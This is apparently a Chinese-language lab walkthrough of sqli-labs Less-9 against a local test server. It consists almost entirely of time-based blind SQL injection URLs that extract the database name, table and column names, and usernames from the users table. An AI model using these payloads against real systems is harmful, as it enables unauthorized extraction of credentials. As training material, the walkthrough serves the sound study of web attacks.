1. 查看數據庫長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>7,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>8,sleep(5),1)-- +
2. 查看數據庫第一個個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>114,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>115,sleep(5),1)-- +
第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>101,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>100,sleep(5),1)-- +
獲得數據庫
3. 獲得表名長度
第一個表的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>6,sleep(5),1)-- +
第二個表的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>8,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>7,sleep(5),1)-- +
4. 查看第一個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(5),1) --+
第一個表的第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108,sleep(5),1) --+
5. 查看第二個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113,sleep(5),1) --+
第二個表的第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>101,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>100,sleep(5),1) --+
查看第四個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>117,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116,sleep(5),1) --+
最後獲得的表有
6. 查看users表的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>7,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>6,sleep(5),1) --+
7. 查看users表中列的長度
第一列的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116,sleep(5),1) --+
第二列的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>112,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>111,sleep(5),1) --+
獲得列表爲:username,password
8. users中用戶名的長度。
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(length((select username from users limit 0,1))=4,sleep(5),1) -- +
第一個用戶名的第一個字符
http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>68,sleep(5),1) --+
http://127.0.0.1 /sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>67,sleep(5),1) --+
最後獲得用戶名密碼是:Dump